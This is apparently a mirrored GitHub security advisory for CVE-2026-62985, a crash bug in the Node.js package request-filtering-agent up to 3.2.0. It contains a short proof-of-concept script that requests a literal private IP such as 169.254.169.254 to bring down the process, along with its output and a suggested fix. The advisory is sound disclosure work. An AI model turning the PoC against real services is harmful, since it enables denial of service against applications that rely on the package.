OFFLINE
Awaiting data
Security intelligence
MajorCritical vulnerability

CVE-2026-62985: request-filtering-agent: Synchronous throw from createConnection() for literal private-IP hosts bypasses req.on('error'), crashing the Node.js process

GitHub Advisories · officialPublished Sep 22, 2026Risk 37/100

### Summary `RequestFilteringHttpAgent` / `RequestFilteringHttpsAgent` block requests to private IPs, but the blocking happens via a **synchronous `throw`** inside `createConnection()` for literal private-IP hostnames (e.g. `169.254.169.254`, `127.0.0.1`). Node.js's `http.request` / `http.get` expects `createConnection` to emit an error asynchronously; a synchronous throw instead escapes the caller's `req.on('error', ...)` handler entirely and becomes an **unhandled exception** that crashes the process. ### Affected `request-filtering-agent` <= 3.2.0 (latest). ### PoC (replicated live on 3.2.0) ```js const http = require('http'); const { RequestFilteringHttpAgent } = require('request-filtering-agent'); const agent = new RequestFilteringHttpAgent(); process.on('uncaughtException', e => { console.log('CRASH:', e.message); // fires — process dies }); const req = http.get({ hostname: '169.254.169.254', port: 80, agent }); req.on('error', e => { /* never reached for literal IPs */ }); ``` Actual output: ``` [email protected] synchronous throw escaping error event: UNCAUGHT EXCEPTION (process crash): DNS lookup 169.254.169.254(...) is not allowed. Because, It is private IP address. *** CRASH CONFIRMED: createConnection throws sync, bypasses req.on("error") *** ``` Note: hostnames that resolve to private IPs (e.g. `localhost`) are handled via the async lookup path and correctly emit an error event — this asymmetry confirms the sync-throw is a defect. ### Impact Any application using `request-filtering-agent` where an attacker can trigger an HTTP request to a literal private-IP (e.g. from a user-supplied URL that is pre-validated but still reaches `http.get`) will crash the Node.js process — full DoS. ### Fix Instead of throwing synchronously in `createConnection()`, call `callback(error)` (the Node.js `net.createConnection` error-callback convention) or use `process.nextTick(() => socket.destroy(error))` on the returned socket to emit the error asynchronously, allowing `req.on('error')` to handle it.

Upgrade affected packages to a patched version: request-filtering-agent 3.2.1.

Vendor
Not specified
Product
request-filtering-agent
Exploitation
none known
Evidence
official
CVSS
7.5

This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.

Open primary source